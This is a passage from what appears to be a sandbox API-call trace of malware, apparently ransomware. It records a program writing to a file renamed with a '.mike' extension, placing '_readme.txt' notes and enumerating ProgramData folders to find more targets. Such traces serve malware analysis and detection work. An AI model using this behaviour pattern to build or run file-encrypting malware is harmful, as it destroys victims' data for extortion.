lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.593] SetFilePointer (in: hFile=0x280, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2f800 [0138.594] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.595] SetFilePointer (in: hFile=0x280, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x32000 [0138.597] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.598] SetFilePointer (in: hFile=0x280, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x34800 [0138.599] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.601] SetFilePointer (in: hFile=0x280, lDistanceToMove=225280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x37000 [0138.602] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.604] SetFilePointer (in: hFile=0x280, lDistanceToMove=235520, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x39800 [0138.606] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.608] SetFilePointer (in: hFile=0x280, lDistanceToMove=245760, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x3c000 [0138.609] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.612] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.655] WriteFile (in: hFile=0x280, lpBuffer=0x2291b78*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2291b78*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.656] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.mike", lpFilePart=0x0) returned 0x3b [0138.656] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", dwFileAttributes=0x80) returned 1 [0138.662] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\StateData\\_readme.txt", lpFilePart=0x0) returned 0x32 [0138.663] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1beeb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1beeb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.664] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1bdba9e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1bdba9e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1beeb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x85220, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacDatabase.sdf.mike", cAlternateFileName="RACDAT~1.MIK")) returned 1 [0138.664] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x1b1f9d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0138.664] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b115500, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1b115500, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b13b660, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDataBookmarks.dat", cAlternateFileName="RACWMI~2.DAT")) returned 1 [0138.665] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b030cc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1b030cc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b0c9240, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0138.665] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1beeb4e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1beeb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1beeb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0138.665] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1beeb4e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1beeb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1beeb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0138.666] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.666] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.666] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.666] CoTaskMemFree (pv=0x4e1c10) [0138.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.666] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\Temp", lpFilePart=0x0) returned 0x21 [0138.667] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd11bbd00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0x1b1d3be0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.667] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd11bbd00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0x1b1d3be0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.667] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.668] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1b1d3be0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b1d3be0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.668] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1b1d3be0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1b1d3be0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.668] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.669] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.669] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.669] CoTaskMemFree (pv=0x4e1c10) [0138.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.669] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search", lpFilePart=0x0) returned 0x1f [0138.670] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.671] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0138.671] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 0 [0138.672] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.672] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.672] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0138.673] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.673] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.673] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.673] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.673] CoTaskMemFree (pv=0x4e1c10) [0138.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.674] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data", lpFilePart=0x0) returned 0x24 [0138.674] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.675] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0138.675] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0138.675] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0138.676] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.676] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.676] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0138.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0138.677] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, 